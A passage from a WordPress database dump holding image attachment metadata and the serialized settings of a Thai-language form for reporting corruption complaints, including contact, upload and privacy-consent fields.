(3949,1407,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1883;s:6:\"height\";i:869;s:4:\"file\";s:19:\"2025/06/1564919.jpg\";s:8:\"filesize\";i:163325;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1564919-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14460;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1564919-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90714;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1564919-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8046;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1564919-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60087;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1564919-1536x709.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160281;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1564919-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20827;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3950,1408,'_wp_attached_file','2025/06/309536.jpg'),
(3951,1408,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1883;s:6:\"height\";i:869;s:4:\"file\";s:18:\"2025/06/309536.jpg\";s:8:\"filesize\";i:136957;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"309536-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13701;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"309536-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79515;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"309536-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7762;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"309536-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53609;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"309536-1536x709.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137205;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"309536-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19725;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3952,1409,'_wp_attached_file','2025/06/1564910.jpg'),
(3953,1409,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1883;s:6:\"height\";i:869;s:4:\"file\";s:19:\"2025/06/1564910.jpg\";s:8:\"filesize\";i:157822;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1564910-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13578;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1564910-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86613;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1564910-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8498;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1564910-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57191;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1564910-1536x709.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152520;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1564910-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20361;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3954,1410,'_wp_attached_file','2025/06/1573002.jpg'),
(3955,1410,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1883;s:6:\"height\";i:869;s:4:\"file\";s:19:\"2025/06/1573002.jpg\";s:8:\"filesize\";i:134001;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1573002-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12915;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1573002-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75881;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1573002-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7196;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1573002-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50859;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1573002-1536x709.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133378;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1573002-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17944;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3956,1411,'_wp_attached_file','2025/06/1573003.jpg'),
(3957,1411,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1883;s:6:\"height\";i:869;s:4:\"file\";s:19:\"2025/06/1573003.jpg\";s:8:\"filesize\";i:123520;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1573003-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13091;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1573003-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72296;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1573003-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7401;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1573003-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49058;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1573003-1536x709.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124309;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1573003-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17938;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3958,1412,'_wp_attached_file','2025/06/1574083.jpg'),
(3959,1412,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1881;s:6:\"height\";i:870;s:4:\"file\";s:19:\"2025/06/1574083.jpg\";s:8:\"filesize\";i:137849;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1574083-300x139.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13024;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1574083-1024x474.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78047;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1574083-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7201;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1574083-768x355.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:355;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52075;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1574083-1536x710.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:710;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136518;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1574083-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18343;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3960,1413,'_wp_attached_file','2025/06/1574084.jpg'),
(3961,1413,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1881;s:6:\"height\";i:870;s:4:\"file\";s:19:\"2025/06/1574084.jpg\";s:8:\"filesize\";i:138504;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1574084-300x139.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12907;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1574084-1024x474.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77842;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1574084-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7141;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1574084-768x355.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:355;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51737;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1574084-1536x710.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:710;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136447;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1574084-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18124;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3963,1403,'_thumbnail_id','1407'),
(3964,1403,'_edit_last','1'),
(3965,1403,'title_style','default'),
(3966,1403,'_title_style','field_5d1a0217cf408'),
(3967,1403,'related',''),
(3968,1403,'_related','field_603b51c3e183e'),
(3969,1414,'title_style','default'),
(3970,1414,'_title_style','field_5d1a0217cf408'),
(3971,1414,'related',''),
(3972,1414,'_related','field_603b51c3e183e'),
(3973,1416,'forminator_form_meta','a:6:{s:6:\"fields\";a:6:{i:0;a:17:{s:2:\"id\";s:6:\"name-1\";s:10:\"element_id\";s:6:\"name-1\";s:7:\"form_id\";s:26:\"wrapper-1511347711918-1669\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:4:\"name\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:27:\"ชื่อ - สกุล\";s:12:\"prefix_label\";s:6:\"Prefix\";s:11:\"fname_label\";s:10:\"First Name\";s:11:\"mname_label\";s:11:\"Middle Name\";s:11:\"lname_label\";s:9:\"Last Name\";s:10:\"wrapper_id\";s:26:\"wrapper-1511347711918-1669\";s:11:\"description\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"multiple_name\";s:5:\"false\";s:16:\"required_message\";s:64:\"กรุณา ใส่ ชื่อ-สกุล จริง\";}i:1;a:15:{s:2:\"id\";s:7:\"email-1\";s:10:\"element_id\";s:7:\"email-1\";s:7:\"form_id\";s:26:\"wrapper-1511347712118-1739\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:13:\"Email Address\";s:10:\"validation\";s:0:\"\";s:15:\"validation_text\";s:0:\"\";s:10:\"wrapper_id\";s:26:\"wrapper-1511347712118-1739\";s:10:\"conditions\";a:0:{}s:13:\"confirm-email\";s:0:\"\";s:11:\"description\";s:0:\"\";s:16:\"required_message\";s:45:\"กรุณากรอกข้อมูล\";}i:2;a:17:{s:2:\"id\";s:7:\"phone-1\";s:10:\"element_id\";s:7:\"phone-1\";s:7:\"form_id\";s:26:\"wrapper-1311247712118-1194\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:5:\"phone\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:105:\"เบอร์โทรศัพท์ที่สามารถติดต่อกลับได้\";s:10:\"validation\";s:15:\"character_limit\";s:21:\"phone_validation_type\";s:8:\"standard\";s:15:\"validation_text\";s:0:\"\";s:10:\"wrapper_id\";s:26:\"wrapper-1311247712118-1194\";s:10:\"conditions\";a:0:{}s:11:\"description\";s:10:\"081xxxxxxx\";s:22:\"phone_national_country\";s:2:\"th\";s:27:\"phone_international_country\";s:2:\"th\";s:16:\"required_message\";s:132:\"กรุณากรอกเบอร์โทรศัพท์ที่สามารถติดต่อกลับได้\";}i:3;a:14:{s:2:\"id\";s:10:\"textarea-1\";s:10:\"element_id\";s:10:\"textarea-1\";s:7:\"form_id\";s:26:\"wrapper-1988247712118-9871\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:66:\"กรอกข้อมูลการร้องเรียน\";s:10:\"input_type\";s:9:\"paragraph\";s:5:\"limit\";s:3:\"500\";s:10:\"limit_type\";s:5:\"words\";s:10:\"wrapper_id\";s:26:\"wrapper-1988247712118-9871\";s:10:\"conditions\";a:0:{}s:16:\"required_message\";s:45:\"กรุณากรอกข้อมูล\";}i:4;a:15:{s:2:\"id\";s:8:\"upload-1\";s:10:\"element_id\";s:8:\"upload-1\";s:7:\"form_id\";s:17:\"wrapper-5139-4132\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:6:\"upload\";s:7:\"options\";a:0:{}s:4:\"cols\";s:2:\"12\";s:10:\"conditions\";a:0:{}s:10:\"wrapper_id\";s:17:\"wrapper-5139-4132\";s:11:\"field_label\";s:29:\"Upload file (ถ้ามี)\";s:9:\"filetypes\";a:99:{i:0;s:9:\"all-image\";i:1;s:9:\"all-video\";i:2;s:12:\"all-document\";i:3;s:9:\"all-audio\";i:4;s:11:\"all-archive\";i:5;s:8:\"all-text\";i:6;s:15:\"all-spreadsheet\";i:7;s:15:\"all-interactive\";i:8;s:12:\"jpg|jpeg|jpe\";i:9;s:3:\"gif\";i:10;s:3:\"png\";i:11;s:3:\"bmp\";i:12;s:8:\"tiff|tif\";i:13;s:4:\"webp\";i:14;s:4:\"avif\";i:15;s:3:\"ico\";i:16;s:4:\"heic\";i:17;s:4:\"heif\";i:18;s:5:\"heics\";i:19;s:5:\"heifs\";i:20;s:7:\"asf|asx\";i:21;s:3:\"wmv\";i:22;s:3:\"wmx\";i:23;s:2:\"wm\";i:24;s:3:\"avi\";i:25;s:4:\"divx\";i:26;s:3:\"flv\";i:27;s:6:\"mov|qt\";i:28;s:12:\"mpeg|mpg|mpe\";i:29;s:7:\"mp4|m4v\";i:30;s:3:\"ogv\";i:31;s:4:\"webm\";i:32;s:3:\"mkv\";i:33;s:8:\"3gp|3gpp\";i:34;s:8:\"3g2|3gp2\";i:35;s:18:\"txt|asc|c|cc|h|srt\";i:36;s:3:\"csv\";i:37;s:3:\"tsv\";i:38;s:3:\"ics\";i:39;s:3:\"rtx\";i:40;s:3:\"vtt\";i:41;s:11:\"mp3|m4a|m4b\";i:42;s:3:\"aac\";i:43;s:6:\"ra|ram\";i:44;s:9:\"wav|x-wav\";i:45;s:7:\"ogg|oga\";i:46;s:4:\"flac\";i:47;s:8:\"mid|midi\";i:48;s:3:\"wma\";i:49;s:3:\"wax\";i:50;s:3:\"mka\";i:51;s:3:\"rtf\";i:52;s:3:\"pdf\";i:53;s:5:\"class\";i:54;s:3:\"tar\";i:55;s:3:\"zip\";i:56;s:7:\"gz|gzip\";i:57;s:2:\"7z\";i:58;s:3:\"psd\";i:59;s:3:\"xcf\";i:60;s:3:\"doc\";i:61;s:11:\"pot|pps|ppt\";i:62;s:3:\"wri\";i:63;s:15:\"xla|xls|xlt|xlw\";i:64;s:3:\"mdb\";i:65;s:3:\"mpp\";i:66;s:4:\"docx\";i:67;s:4:\"docm\";i:68;s:4:\"dotx\";i:69;s:4:\"dotm\";i:70;s:4:\"xlsx\";i:71;s:4:\"xlsm\";i:72;s:4:\"xlsb\";i:73;s:4:\"xltx\";i:74;s:4:\"xltm\";i:75;s:4:\"xlam\";i:76;s:4:\"pptx\";i:77;s:4:\"pptm\";i:78;s:4:\"ppsx\";i:79;s:4:\"ppsm\";i:80;s:4:\"potx\";i:81;s:4:\"potm\";i:82;s:4:\"ppam\";i:83;s:4:\"sldx\";i:84;s:4:\"sldm\";i:85;s:28:\"onetoc|onetoc2|onetmp|onepkg\";i:86;s:4:\"oxps\";i:87;s:3:\"xps\";i:88;s:3:\"odt\";i:89;s:3:\"odp\";i:90;s:3:\"ods\";i:91;s:3:\"odg\";i:92;s:3:\"odc\";i:93;s:3:\"odb\";i:94;s:3:\"odf\";i:95;s:6:\"wp|wpd\";i:96;s:3:\"key\";i:97;s:7:\"numbers\";i:98;s:5:\"pages\";}s:9:\"file-type\";s:6:\"single\";s:10:\"file-limit\";s:9:\"unlimited\";s:12:\"upload-limit\";s:1:\"8\";s:8:\"filesize\";s:2:\"MB\";}i:5;a:18:{s:2:\"id\";s:10:\"checkbox-1\";s:10:\"element_id\";s:10:\"checkbox-1\";s:7:\"form_id\";s:17:\"wrapper-5553-3896\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";a:4:{i:0;a:6:{s:5:\"label\";s:138:\"ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น\";s:5:\"value\";s:138:\"ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:1:\"1\";s:3:\"key\";s:9:\"2066-5314\";s:5:\"error\";s:0:\"\";}i:1;a:6:{s:5:\"label\";s:195:\"ข้อมูลผู้ร้องเรียนจะถูกเข้าถึงโดยเจ้าหน้าที่ที่เกี่ยวข้องเท่านั้น\";s:5:\"value\";s:60:\"ข้อมูลผู้ร้องเรียนจะ\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:1:\"1\";s:3:\"key\";s:9:\"2739-1920\";s:5:\"error\";s:0:\"\";}i:2;a:6:{s:5:\"label\";s:172:\"ข้อมูลจะถูกเก็บไว้เป็นระยเวลา 1 ปี หลังจากดำเนินการเสร็จสิ้น\";s:5:\"value\";s:96:\"ข้อมูลจะถูกเก็บไว้เป็นระยเวลา-1-ปี\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:1:\"1\";s:3:\"key\";s:9:\"5353-6721\";s:5:\"error\";s:0:\"\";}i:3;a:6:{s:5:\"label\";s:159:\"ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ\";s:5:\"value\";s:159:\"ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:9:\"6066-3633\";s:5:\"error\";s:0:\"\";}}s:4:\"cols\";s:2:\"12\";s:10:\"conditions\";a:0:{}s:10:\"wrapper_id\";s:17:\"wrapper-5553-3896\";s:15:\"hidden_behavior\";s:4:\"zero\";s:10:\"value_type\";s:8:\"checkbox\";s:11:\"field_label\";s:63:\"นโยบายความเป็นส่วนตัว\";s:6:\"layout\";s:8:\"vertical\";s:19:\"options_bulk_editor\";s:1136:\"ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น;ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น; 1\nข้อมูลผู้ร้องเรียนจะถูกเข้าถึงโดยเจ้าหน้าที่ที่เกี่ยวข้องเท่านั้น;ข้อมูลผู้ร้องเรียนจะ; 1\nข้อมูลจะถูกเก็บไว้เป็นระยเวลา 1 ปี หลังจากดำเนินการเสร็จสิ้น;ข้อมูลจะถูกเก็บไว้เป็นระยเวลา-1-ปี; 1\nข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ;ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ; 0\";s:11:\"description\";s:276:\"ข้อมูลของท่านจะถูกเก็บไว้เป็นความลับ ตาม พรบ.คุ้มครองข้อมูลส่วนบุคคล พ.ศ. 2562 โดยมีรายละเอียดดังนี้\";s:16:\"options_expanded\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:16:\"required_message\";s:0:\"\";}}s:8:\"settings\";a:100:{s:17:\"pagination-header\";s:3:\"nav\";s:14:\"paginationData\";a:2:{s:24:\"pagination-header-design\";s:4:\"show\";s:17:\"pagination-header\";s:3:\"nav\";}s:8:\"formName\";s:129:\"แจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ\";s:7:\"version\";s:6:\"1.44.1\";s:17:\"form-border-style\";s:4:\"none\";s:12:\"form-padding\";s:0:\"\";s:11:\"form-border\";s:0:\"\";s:12:\"fields-style\";s:4:\"open\";s:16:\"field-image-size\";s:6:\"custom\";s:10:\"validation\";s:9:\"on_submit\";s:18:\"akismet-protection\";s:1:\"1\";s:10:\"form-style\";s:7:\"default\";s:13:\"form-substyle\";s:7:\"default\";s:11:\"enable-ajax\";s:4:\"true\";s:9:\"autoclose\";s:4:\"true\";s:20:\"submission-indicator\";s:4:\"show\";s:15:\"indicator-label\";s:13:\"Submitting...\";s:18:\"cform-color-option\";s:5:\"theme\";s:22:\"basic-field-image-size\";s:6:\"custom\";s:18:\"basic-fields-style\";s:4:\"open\";s:17:\"store_submissions\";s:1:\"1\";s:20:\"description-position\";s:5:\"above\";s:9:\"form-type\";s:7:\"default\";s:20:\"submission-behaviour\";s:18:\"behaviour-thankyou\";s:16:\"thankyou-message\";s:57:\"Thank you for contacting us, we will be in touch shortly.\";s:10:\"submitData\";a:2:{s:18:\"custom-submit-text\";s:27:\"ส่งเรื่อง\";s:27:\"custom-invalid-form-message\";s:53:\"Error: Your form is not valid, please fix the errors!\";}s:17:\"validation-inline\";s:1:\"1\";s:11:\"form-expire\";s:9:\"no_expire\";s:16:\"form-padding-top\";s:1:\"0\";s:18:\"form-padding-right\";s:1:\"0\";s:19:\"form-padding-bottom\";s:1:\"0\";s:17:\"form-padding-left\";s:1:\"0\";s:17:\"form-border-width\";s:1:\"0\";s:18:\"form-border-radius\";s:1:\"0\";s:23:\"cform-label-font-family\";s:6:\"Roboto\";s:25:\"cform-label-custom-family\";s:0:\"\";s:21:\"cform-label-font-size\";s:2:\"12\";s:23:\"cform-label-font-weight\";s:4:\"bold\";s:23:\"cform-title-font-family\";s:6:\"Roboto\";s:25:\"cform-title-custom-family\";s:0:\"\";s:21:\"cform-title-font-size\";s:2:\"45\";s:23:\"cform-title-font-weight\";s:6:\"normal\";s:22:\"cform-title-text-align\";s:4:\"left\";s:26:\"cform-subtitle-font-family\";s:6:\"Roboto\";s:26:\"cform-subtitle-custom-font\";s:0:\"\";s:24:\"cform-subtitle-font-size\";s:2:\"18\";s:26:\"cform-subtitle-font-weight\";s:6:\"normal\";s:25:\"cform-subtitle-text-align\";s:4:\"left\";s:23:\"cform-input-font-family\";s:6:\"Roboto\";s:23:\"cform-input-custom-font\";s:0:\"\";s:21:\"cform-input-font-size\";s:2:\"16\";s:23:\"cform-input-font-weight\";s:6:\"normal\";s:23:\"cform-radio-font-family\";s:6:\"Roboto\";s:23:\"cform-radio-custom-font\";s:0:\"\";s:21:\"cform-radio-font-size\";s:2:\"14\";s:23:\"cform-radio-font-weight\";s:6:\"normal\";s:24:\"cform-select-font-family\";s:6:\"Roboto\";s:26:\"cform-select-custom-family\";s:0:\"\";s:22:\"cform-select-font-size\";s:2:\"16\";s:24:\"cform-select-font-weight\";s:6:\"normal\";s:29:\"cform-multiselect-font-family\";s:6:\"Roboto\";s:29:\"cform-multiselect-custom-font\";s:0:\"\";s:27:\"cform-multiselect-font-size\";s:2:\"16\";s:29:\"cform-multiselect-font-weight\";s:6:\"normal\";s:33:\"cform-multiselect-tag-font-family\";s:6:\"Roboto\";s:33:\"cform-multiselect-tag-custom-font\";s:0:\"\";s:31:\"cform-multiselect-tag-font-size\";s:2:\"12\";s:33:\"cform-multiselect-tag-font-weight\";s:6:\"medium\";s:26:\"cform-dropdown-font-family\";s:6:\"Roboto\";s:26:\"cform-dropdown-custom-font\";s:0:\"\";s:24:\"cform-dropdown-font-size\";s:2:\"16\";s:26:\"cform-dropdown-font-weight